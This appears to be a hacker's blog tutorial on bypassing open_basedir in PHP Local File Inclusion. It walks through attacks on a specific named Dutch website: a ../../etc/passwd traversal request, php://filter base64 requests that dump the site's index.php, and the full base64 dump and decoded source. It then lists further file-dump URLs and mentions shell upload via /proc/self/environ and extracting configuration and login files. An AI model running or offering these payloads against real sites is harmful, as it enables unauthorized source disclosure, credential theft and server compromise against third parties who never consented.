Hello,
Ever thought you can read the PHP Files using Local File Inclusion. ? Let me explain, i will show how do i bypassed the LFI Restrictions. In this tutorial i am going to give you a url to show you how this works and how to bypass openbase dir restriction etc. It doesn’t work always, but if you do perfect encoding then it will work.
Example of base 64 encode file out
(php://filter/convert.base64-encode/resource=index.php&top=Home)
Let me show you a POC :
Target URL
——————————————-
http://mistflard.nl/index.php?page=home.php (200)ok
URL THAT TRIGGERED ERROR
——————————
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
ERROR
———-
Warning: include() [function.include]: open_basedir restriction ineffect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in/home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129 Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/
Now, lets see what we can do here.
1) http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
2) Base 64 Encoded Response
——————————————————
PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj0kX0dFVFsnbG9naW4nXTsKPz4KPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbnRlbnQgPSAid2lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgo8IS0tW2lmIElFIDZdPiA8bGluayBocmVmPSJzdGlqbDEuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj48IVtlbmRpZl0tLT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvZmF2aWNvbi5pY28iIC8+Cjx0aXRsZT5taXN0ZmxhcmQ8L3RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJtZDUuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gcGFzc1Jlc3BvbnNlKCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9naW4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51c2VyLnZhbHVlIAogIC8vZG9jdW1lbnQuaGZvcm0ucGFzcy52YWx1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2dpbi5wYXNzX3RlbXAudmFsdWU7CmRvY3VtZW50LmxvZ2luLnBhc3NfdGVtcC52YWx1ZSA9ICIiOwp3YWNodDE9TUQ1KHBhc3MpLnRvTG93ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhPW1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/PjsgCndhY2h0Mj1NRDUoYnVmZikudG9Mb3dlckNhc2UoKTsKZG9jdW1lbnQuaGZvcm0udXNlci52YWx1ZT11c2VyX2VsZW1lbnQ7CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0MjsKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hvICRwYXJhOyA/PjsKZG9jdW1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaWQ9Ik1haW4iPgo8ZGl2IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaWYgKCRfU0VTU0lPTlsndXNlciddPT1udWxsKQp7CmlmICgkbG9naW49PTEpIGVjaG8gIjxhIGhyZWY9J2luZGV4LnBocD9wYWdlPWhvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGltZyBzcmM9J2ltYWdlcy9rbm9weS5naWYnIGFsdD0ndWl0JyBzdHlsZT0nYm9yZGVyOjAnLz48L2E+IjsgZWxzZSBlY2hvICI8YSBocmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5waHAmbG9naW49MScgPjxpbWcgc3JjPSdpbWFnZXMva25vcHguZ2lmJyBhbHQ9J2Fhbicgc3R5bGU9J2JvcmRlcjowJy8+PC9hPiI7CmlmICgkbG9naW4hPTEpCnsKaW5jbHVkZSAiY29udHJvbGUucGhwIjsKZWNobyAiPHRhYmxlPjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC90ZD48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRyPjxmb3JtIGFjdGlvbj0nbG9naW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcm5hbWUnIHZhbHVlPScnIHN0eWxlPSd3aWR0aDo4N3B4O2hlaWdodDoxMnB4O2ZvbnQtc2l6ZToxMXB4Jy8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J3Bhc3N3b3JkJyBuYW1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J2xvZ2luJyBjbGFzcz0na25vcDEnLz48L3RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAnPGZvcm0gbmFtZT0ibG9naW4iPic7CmVjaG8gJzx0YWJsZT48dHI+PHRkPmdlYnJ1aWtlcnNuYWFtOjwvdGQ+PHRkPndhY2h0d29vcmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHlsZT0nd2lkdGg6ODdweDtoZWlnaHQ6MTJweDtmb250LXNpemU6MTFweCcgLz48L3RkPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ncGFzc3dvcmQnIG5hbWU9J3Bhc3NfdGVtcCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICc8dGQ+PGlucHV0IG9uQ2xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9IkxvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI+PC90ZD4nOwplY2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2dpbnZlaWxpZy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZvcm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjb2RlIj4nOwplY2hvICc8L2Zvcm0+JzsKfQp9IGVsc2UKewplY2hvICI8aW1nIHNyYz0naW1hZ2VzL2tub3B6LmdpZicgYWx0PScnIHN0eWxlPSdib3JkZXI6MCcvPjwvYT4iOwokdXNlcj0kX1NFU1NJT05bJ3VzZXInXTsKZWNobyAiPHRhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdXNlciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPjx0ZD48Zm9ybSBhY3Rpb249J2xvZ3VpdC5waHAnIG1ldGhvZD0ncG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3ViMmEnIHZhbHVlPSdsb2d1aXQnIGNsYXNzPSdrbm9wMScgdGl0bGU9J3VpdGxvZ2dlbicvPiI7CmVjaG8gIjwvZm9ybT48L3RkPiI7ICAgLy8oPGEgaHJlZj0ibG9ndWl0LnBocCI+TG9ndWl0PC9hPikKIAp9CmlmICgoJF9TRVNTSU9OWyd1c2VyJ109PW51bGwpICYmICgkbG9naW4hPTEpKQp7CmVjaG8gIjxmb3JtIGFjdGlvbj0naW5kZXgucGhwP3BhZ2U9cGhwL2ZvcnVtL21lbGRhYW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWJtaXRCdXR0b24nIHZhbHVlPSdpbnNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPC90ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vdmVyZ2V0ZW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub3AwJyB0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MSkKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnBocD9wYWdlPXBocC9mb3J1bS9zY2hyaWpmdWl0LnBocCcgbWV0aG9kPSdwb3N0Jz4iOyBlY2hvIjx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0nIHZhbHVlPVwiJHVzZXJcIj4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwogaWYgKCR1c2VyPT0nYWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2xhc3M9J2tub3AwJyB0aXRsZT0nSW5zdGVsbGluZ2VuJy8+IjsKIGVjaG8gIjwvdGQ+PC9mb3JtPiI7CiB9CiAKfSBlY2hvICI8L3RyPjwvdGFibGU+PC9kaXY+IjsgLy8gZWluZGUgbG9naW4KJHZvcm0xPScnOyR2b3JtMj0nJzskdm9ybTM9Jyc7JHZvcm00PScnOyR2b3JtNT0nJzskdm9ybTY9Jyc7CmlmIChpc3NldCgkX0dFVFsncGFnZSddKSkKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKZWxzZSAkcGFnZSA9ICJpbmxlaWRpbmcucGhwIjsgCmlmICgkcGFnZT09ImlubGVpZGluZy5waHAiKSAgIHskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAiKXskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob21lLnBocCIpICAgICAgICB7JHZvcm0yPSdibG9rJzt9IGVsc2UKaWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3JtMz0nYmxvayc7fSBlbHNlCmlmICgkcGFnZT09ImZvcnVtcmVnZWxzLnBocCIpIHskdm9ybTQ9J2Jsb2snO30gZWxzZQppZiAoKCRwYWdlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZm9ybS5waHAiKSB8fCAoJHBhZ2U9PSJtYWlsLnBocCIpICkgeyR2b3JtNT0nYmxvayc7fSBlbHNlIHskdm9ybTI9J2Jsb2snOyB9Cj8+CjwvZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiBjbGFzcz0ibWVudSI+CiA8ZGl2IGNsYXNzPSJob3Zlcm1lbnUiPgogPHVsPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZy5waHAiIHRpdGxlPSJJbmxlaWRpbmciPjxzcGFuPklubGVpZGluZzwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCIgdGl0bGU9IkZvcnVtIj48c3Bhbj5Gb3J1bTwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPlRvZWxpY2h0aW5nPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWZvcnVtcmVnZWxzLnBocCIgdGl0bGU9IiI+PHNwYW4+Rm9ydW0gcmVnZWxzPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWNvbnRhY3QucGhwIiB0aXRsZT0iIj48c3Bhbj5Db250YWN0PC9zcGFuPjwvYT48L2xpPgogPC91bD4KPC9kaXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0tIHZvb3IgSUUgNiAtLT48L2Rpdj4KPD9waHAKaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQogICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwplbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiOyAKPz4KPD9waHAKZWNobyI8ZGl2IGlkPSdDb250ZW50Jz4iOwppZiAoKCRwYWdlPT0iaW5sZWlkaW5nYWRtaW4ucGhwIikgJiYgKCRfU0VTU0lPTlsndXNlciddIT1udWxsKSkgJHBhZ2U9ImlubGVpZGluZy5waHAiOwppbmNsdWRlICRwYWdlOyAKZWNobyAiPC9kaXY+IjsgLyplaW5kZSBjb250ZW50ICovCj8+CjxkaXYgaWQ9IlZvZXQiPgo8P3BocApzZXRsb2NhbGUoTENfVElNRSwnbmxfTkwnLCdubCcsJ2R1Jyk7CmVjaG8gIjxkaXYgc3R5bGU9J21hcmdpbi1sZWZ0OjYwMHB4O21hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5kOiAnLCBzdHJmdGltZSgiJUg6JU06JVMgJUEgJWQgJUIgJVkiLCBta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4gPCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaHR0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsKPC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYWNrZXIgPSBfZ2F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKSB7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9odG1sPg==
—————————————————————————————————
3) DECODED RESPONSE
—————————————————————————————————
function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value
//document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";
buff=wacht1+;
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=;
document.hform.submit();
}
controle.php";
echo "
"; echo "";
echo "
"; echo "";
echo " ";
echo " ";
echo " ";
echo " ";
} else
{
echo '';
echo '
';
echo " ";
echo " ";
echo ' ';
echo '';
echo '';
echo '';
echo '';
echo '';
echo '';
}
} else
{
echo "";
$user=$_SESSION['user'];
echo "
";
echo "
"; //(Loguit)}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
} else if ($login!=1)
{
echo ""; echo"
";
echo "";
echo "";
echo "";
if ($user=='admin')
{
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6='';
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php") {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php") {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
echo"
";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "
"; /*einde content */
?>
".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'
';
?>
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}
4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect so i highly doubt we can upload a shell via proc/self/environ but we can try it.
5.) So i grab prepend.php and decode its contents as well,using opionated geeks base 64 decoder online and got the following
Response after decode
Writing other response would be too long for the blog. So you can get Base 64 encoded of any PHP page of the website
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/login/versio.inc.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/vergeten.php
http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=php/forum/meldaan.php
6.)Now if you can read any of the files, then lets try on config. That wasn’t easy but you can also extract the configuration.php /config.php file too.
———————————
login info
———————————-
and to top it off they block access from outside to the mysql server so what are we to do. So this is how i bypass LFI where direct query is blocked.
Thank you. 🙂
Aaditya Purani - Hacker 